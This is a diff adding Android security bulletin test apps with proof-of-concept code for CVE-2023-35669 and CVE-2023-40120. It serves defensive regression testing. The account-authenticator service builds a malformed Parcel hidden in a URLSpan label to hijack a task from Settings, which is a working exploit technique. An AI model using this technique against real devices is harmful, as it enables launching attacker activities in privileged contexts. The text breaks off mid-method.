+    package="android.security.cts.CVE_2023_35669_test">
+
+    <application>
+        <activity android:name=".HijackActivity" />
+
+        <service
+            android:name=".PocAuthService"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.accounts.AccountAuthenticator" />
+            </intent-filter>
+            <meta-data
+                android:name="android.accounts.AccountAuthenticator"
+                android:resource="@xml/authenticator" />
+        </service>
+
+        <activity android:name=".PocActivity" />
+    </application>
+
+    <instrumentation
+        android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_35669_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml
new file mode 100644
index 0000000..a4906cb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
+    android:accountType="testevilaccount"
+    android:label="@string/app_name"/>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java
new file mode 100644
index 0000000..026aa57
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    private String mPocActivityStatus;
+    public static int sTaskId;
+    public static final int TIMEOUT_MS = 5000;
+
+    @Test
+    public void testCVE_2023_35669() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            runWithShellPermissionIdentity(
+                    () -> {
+                        // Registering a receiver here to wait for broadcast
+                        final Semaphore targetReturn = new Semaphore(0);
+                        final Semaphore hijackReturn = new Semaphore(0);
+                        final Semaphore pocReturn = new Semaphore(0);
+                        BroadcastReceiver broadcastReceiver =
+                                new BroadcastReceiver() {
+                                    @Override
+                                    public void onReceive(Context context, Intent intent) {
+                                        try {
+                                            // Wait for TargetActivity to get launched
+                                            if (intent.getBooleanExtra(
+                                                    context.getString(R.string.actionTarget),
+                                                    false)) {
+                                                // Fetch taskId
+                                                sTaskId =
+                                                        intent.getIntExtra(
+                                                                context.getString(R.string.taskId),
+                                                                -1);
+                                                if (sTaskId != -1) {
+                                                    targetReturn.release();
+                                                }
+                                            }
+
+                                            // Wait for HijackActivity to get launched
+                                            if (intent.getBooleanExtra(
+                                                    context.getString(R.string.isVulnerable),
+                                                    false)) {
+                                                hijackReturn.release();
+                                            }
+
+                                            // Wait for PocActivity to get launched
+                                            mPocActivityStatus =
+                                                    intent.getStringExtra(
+                                                            context.getString(
+                                                                    R.string.pocActivityStatus));
+                                            if (mPocActivityStatus != null) {
+                                                pocReturn.release();
+                                            }
+                                        } catch (Exception ignored) {
+                                            // ignore any exceptions
+                                        }
+                                    }
+                                };
+                        IntentFilter filter =
+                                new IntentFilter(context.getString(R.string.bcastActionTarget));
+                        context.registerReceiver(broadcastReceiver, filter);
+
+                        // Start TargetActivity
+                        context.startActivity(
+                                new Intent(Intent.ACTION_MAIN)
+                                        .setClassName(
+                                                context.getString(R.string.pkgTarget),
+                                                context.getString(R.string.activityTarget))
+                                        .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+                        assumeTrue(
+                                context.getString(R.string.targetFailMsg),
+                                targetReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+
+                        // Start PocActivity
+                        context.startActivity(
+                                new Intent(context, PocActivity.class)
+                                        .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+                        assumeTrue(
+                                context.getString(R.string.pocFailedMsg),
+                                pocReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+                        assumeTrue(
+                                context.getString(R.string.pocCrashedMsg, mPocActivityStatus),
+                                mPocActivityStatus.equals(
+                                        context.getString(R.string.noExceptionMsg)));
+
+                        // Wait for account name to appear on display and then click
+                        UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+                        clickObject(context, uiDevice, context.getString(R.string.accountName));
+
+                        // Click on 'Remove Account' button
+                        clickObject(context, uiDevice, context.getString(R.string.removeAccount));
+
+                        // Click on 'Remove Account' popup to confirm account removal
+                        clickObject(context, uiDevice, context.getString(R.string.removeAccount));
+
+                        // On vulnerable device, HijackActivity will be launched and the test fails
+                        assertFalse(
+                                context.getString(R.string.msgFailure),
+                                hijackReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+                    });
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    public void clickObject(Context context, UiDevice uiDevice, String objectName) {
+        Pattern activityPattern = Pattern.compile(objectName, Pattern.CASE_INSENSITIVE);
+        BySelector removeAccountSelector = By.text(activityPattern);
+        UiObject2 uiObject = uiDevice.wait(Until.findObject(removeAccountSelector), TIMEOUT_MS);
+        assumeNotNull(context.getString(R.string.objectNotFound, objectName), uiObject);
+        uiObject.click();
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java
new file mode 100644
index 0000000..cbc869f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class HijackActivity extends Activity {
+
+    @Override
+    public void onResume() {
+        try {
+            super.onResume();
+            sendBroadcast(
+                    new Intent(getString(R.string.bcastActionTarget))
+                            .putExtra(getString(R.string.isVulnerable), true));
+        } catch (Exception ignored) {
+            // Ignoring exceptions here
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java
new file mode 100644
index 0000000..48cec73
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.accounts.Account;
+import android.accounts.AccountManager;
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+import android.provider.Settings;
+
+public class PocActivity extends Activity {
+
+    @Override
+    public void onResume() {
+        try {
+            super.onResume();
+
+            // Adding account
+            getSystemService(AccountManager.class)
+                    .addAccountExplicitly(
+                            new Account(
+                                    getString(R.string.accountName),
+                                    getString(R.string.accountType)),
+                            getString(R.string.password),
+                            new Bundle());
+
+            // Show settings to allow configuration of sync settings
+            startActivity(new Intent(Settings.ACTION_SYNC_SETTINGS));
+            sendBroadcast(
+                    new Intent(getString(R.string.bcastActionTarget))
+                            .putExtra(
+                                    getString(R.string.pocActivityStatus),
+                                    getString(R.string.noExceptionMsg)));
+        } catch (Exception e) {
+            try {
+                sendBroadcast(
+                        new Intent(getString(R.string.bcastActionTarget))
+                                .putExtra(getString(R.string.pocActivityStatus), e.getMessage()));
+            } catch (Exception ignored) {
+                // Ignore any exceptions
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java
new file mode 100644
index 0000000..4cdf4e5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java
@@ -0,0 +1,177 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.accounts.NetworkErrorException;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.LabeledIntent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.Parcel;
+import android.text.SpannableString;
+import android.text.style.URLSpan;
+
+import java.lang.reflect.Field;
+import java.nio.charset.StandardCharsets;
+
+public class PocAuthService extends Service {
+
+    private Bundle createResultBundle() {
+        try {
+            Bundle result = new Bundle();
+            result.putString(AccountManager.KEY_ACCOUNT_NAME, "testevilaccountname");
+            result.putString(AccountManager.KEY_ACCOUNT_TYPE, "testevilaccount");
+            result.putString(AccountManager.KEY_AUTHTOKEN, "mockAuthToken");
+            return result;
+        } catch (Exception ignored) {
+            // Ignore any exceptions
+        }
+        return null;
+    }
+
+    public PocAuthService() {}
+
+    @Override
+    public IBinder onBind(Intent intent) {
+        return new TestAccountAuthenticator(this).getIBinder();
+    }
+
+    class TestAccountAuthenticator extends AbstractAccountAuthenticator {
+
+        public TestAccountAuthenticator(Context context) {
+            super(context);
+        }
+
+        @Override
+        public Bundle getAccountRemovalAllowed(
+                AccountAuthenticatorResponse response, Account account)
+                throws NetworkErrorException {
+
+            try {
+                LabeledIntent labeledIntent =
+                        new LabeledIntent(
+                                new Intent(PocAuthService.this, HijackActivity.class),
+                                null /* sourcePackage */,
+                                1 /* labelRes */,
+                                0 /* icon */);
+
+                // Creating parcel to setDataPosition
+                Parcel optionPayload = Parcel.obtain();
+                Bundle evilOptions = new Bundle();
+                evilOptions.putInt(getString(R.string.launchTaskId), DeviceTest.sTaskId);
+                evilOptions.writeToParcel(optionPayload, 0 /* flags */);
+                optionPayload.setDataPosition(0 /* position */);
+                int originLen = optionPayload.readInt();
+                optionPayload.setDataPosition(0 /* position */);
+
+                // Parcel data not fully consumed, unread size : 76
+                optionPayload.writeInt(originLen + 76);
+
+                // Creating parcel to create URLSpan
+                Parcel payload = Parcel.obtain();
+                payload.writeString(null /* resultWho */);
+                payload.writeInt(-1 /* requestCode */);
+                payload.writeInt(0 /* flags */);
+                payload.writeTypedObject(null, 0 /* profilerInfo */);
+                payload.writeInt(1 /* value */);
+                payload.appendFrom(optionPayload, 0 /* offset */, optionPayload.dataSize());
+
+                SpannableString spannableString =
+                        new SpannableString(getString(R.string.spannableString));
+                spannableString.setSpan(
+                        new URLSpan(new String(payload.marshall(), StandardCharsets.UTF_16LE)),
+                        0 /* start */,
+                        0 /* end */,
+                        0 /* flags */);
+
+                // Setting labeledIntent using refelection
+                Field nonLocalizedLabelField =
+                        LabeledIntent.class.getDeclaredField(getString(R.string.fieldName));
+                nonLocalizedLabelField.setAccessible(true);
+                nonLocalizedLabelField.set(labeledIntent, spannableString);
+
+                Bundle result = new Bundle();
+                result.putParcelable(AccountManager.KEY_INTENT, labeledIntent);
+                return result;
+            } catch (Exception ignored) {
+                // Ignore any exceptions
+            }
+            return null;
+        }
+
+        @Override
+        public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+            return createResultBundle();
+        }
+
+        @Override
+        public Bundle addAccount(
+                AccountAuthenticatorResponse response,
+                String accountType,
+                String authTokenType,
+                String[] requiredFeatures,
+                Bundle options)
+                throws NetworkErrorException {
+            return createResultBundle();
+        }
+
+        @Override
+        public Bundle confirmCredentials(
+                AccountAuthenticatorResponse response, Account account, Bundle options)
+                throws NetworkErrorException {
+            return createResultBundle();
+        }
+
+        @Override
+        public Bundle getAuthToken(
+                AccountAuthenticatorResponse response,
+                Account account,
+                String authTokenType,
+                Bundle options)
+                throws NetworkErrorException {
+            return createResultBundle();
+        }
+
+        @Override
+        public String getAuthTokenLabel(String authTokenType) {
+            return "mockAuthTokenLabel";
+        }
+
+        @Override
+        public Bundle updateCredentials(
+                AccountAuthenticatorResponse response,
+                Account account,
+                String authTokenType,
+                Bundle options)
+                throws NetworkErrorException {
+            return createResultBundle();
+        }
+
+        @Override
+        public Bundle hasFeatures(
+                AccountAuthenticatorResponse response, Account account, String[] features)
+                throws NetworkErrorException {
+            return createResultBundle();
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp
new file mode 100644
index 0000000..cd67da5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-40120",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+        "sts-device-util",
+        "truth",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml
new file mode 100644
index 0000000..020a20f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_40120">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_40120" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java
new file mode 100644
index 0000000..c0c1ce5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java
@@ -0,0 +1,148 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_40120;
+
+import static android.provider.Settings.Global.SHOW_MEDIA_ON_QUICK_SETTINGS;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.media.MediaMetadata;
+import android.media.session.MediaSession;
+import android.service.notification.StatusBarNotification;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testPocCVE_2023_40120() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+
+            // Create a MediaSession
+            MediaSession session =
+                    new MediaSession(context, "cve_2023_40120_session" /* session name */);
+
+            // Create a MediaMetadata object, pass an empty 'METADATA_KEY_TITLE' and set metadata
+            // for session
+            String artistName = "testArtist";
+            session.setMetadata(
+                    new MediaMetadata.Builder()
+                            .putString(MediaMetadata.METADATA_KEY_TITLE, "")
+                            .putString(MediaMetadata.METADATA_KEY_ARTIST, artistName)
+                            .build());
+
+            // Create notificationManager
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+
+            // Create notificationChannel
+            String channelId = "cve_2023_40120_channel_id";
+            notificationManager.createNotificationChannel(
+                    new NotificationChannel(
+                            channelId,
+                            "cve_2023_40120_channel_name" /* notification channel name */,
+                            NotificationManager.IMPORTANCE_DEFAULT));
+
+            // Post the Notification and check if any security exception is caught
+            notificationManager.notify(
+                    0 /* notification id */,
+                    new Notification.Builder(context)
+                            .setChannelId(channelId)
+                            .setStyle(
+                                    new Notification.DecoratedMediaCustomViewStyle()
+                                            .setMediaSession(session.getSessionToken()))
+                            .setSmallIcon(
+                                    Icon.createWithData(
+                                            new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+                            .build());
+
+            // Check if notification gets posted or not
+            assume().withMessage("Notification was not posted")
+                    .that(
+                            poll(
+                                    () -> {
+                                        StatusBarNotification[] activeNotifications =
+                                                notificationManager.getActiveNotifications();
+                                        for (StatusBarNotification notification :
+                                                activeNotifications) {
+                                            if (notification
+                                                    .getPackageName()
+                                                    .equals(context.getPackageName())) {
+                                                return true;
+                                            }
+                                        }
+                                        return false;
+                                    }))
+                    .isTrue();
+
+            // Launch notification shade
+            UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+            assume().withMessage("Unable to launch notification shade")
+                    .that(uiDevice.openNotification())
+                    .isTrue();
+
+            // Wait for 'qs_media_controls' resource id to appear
+            String systemuiPackage = "com.android.systemui";
+            UiObject2 resIdObj =
+                    uiDevice.wait(
+                            Until.findObject(By.res(systemuiPackage, SHOW_MEDIA_ON_QUICK_SETTINGS)),
+                            3000);
+
+            // Assumption failure if 'resIdObj' is null
+            assume().withMessage("resource id qs_media_controls not found")
+                    .that(resIdObj)
+                    .isNotNull();
+
+            // Assumption failure if 'testArtist' text is not present in notification
+            assume().withMessage("testArtist text not found")
+                    .that(resIdObj.getContentDescription().contains(artistName))
+                    .isTrue();
+
+            // Fail the test if either notification title is not present or notification title text
+            // is null
+            UiObject2 headerTitleObj =
+                    resIdObj.getParent().findObject(By.res(systemuiPackage, "header_title"));
+            assertWithMessage("Device is vulnerable to b/274775190 hence foreground services can be"
+                            + " started with an empty notification")
+                    .that(headerTitleObj == null || headerTitleObj.getText() == null)
+                    .isFalse();
+        } catch (Exception e) {
+            assume().that(e).isNull();
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp
new file mode 100644
index 0000000..5df144f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "TestLocationScanningServicesUsingSlices",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.slice_slice-view",
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+    platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml
new file mode 100644
index 0000000..689397d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.TestLocationScanningServicesUsingSlices">
+    <application android:testOnly="true">
+        <activity android:name=".PocActivity" />
+        <receiver android:name=".PocDeviceAdminReceiver"
+            android:permission="android.permission.BIND_DEVICE_ADMIN"
+            android:exported="true">
+            <meta-data android:name="android.app.device_admin"
+                android:resource="@xml/device_policies" />
+            <intent-filter>
+                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+            </intent-filter>
+        </receiver>
+    </application>
+    <instrumentation
+        android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.TestLocationScanningServicesUsingSlices" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml
new file mode 100644
index 0000000..ed5352d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<device-admin>
+    <uses-policies />
+</device-admin>
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java
new file mode 100644
index 0000000..f936221
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java
@@ -0,0 +1,227 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.TestLocationScanningServicesUsingSlices;
+
+import static android.os.UserManager.DISALLOW_CONFIG_LOCATION;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.PendingIntent;
+import android.app.admin.DevicePolicyManager;
+import android.app.slice.SliceProvider;
+import android.content.ComponentName;
+import android.content.ContentResolver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    private final int waitMS = 5_000;
+    private final String mSettingsPackage = "com.android.settings";
+    private final String mScanningTextResId = mSettingsPackage + ":id/switch_text";
+    private final String mScanningWidgetResId = "android:id/switch_widget";
+    private final String mBaseUri = "content://" + mSettingsPackage + ".slices/action/";
+
+    private Context mContext;
+    private ContentResolver mContentResolver;
+    private UiDevice mDevice;
+    private Resources mSettingsResources;
+
+    @Before
+    public void setUp() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            mContext = instrumentation.getTargetContext();
+            mContentResolver = mContext.getContentResolver();
+            mDevice = UiDevice.getInstance(instrumentation);
+            mSettingsResources =
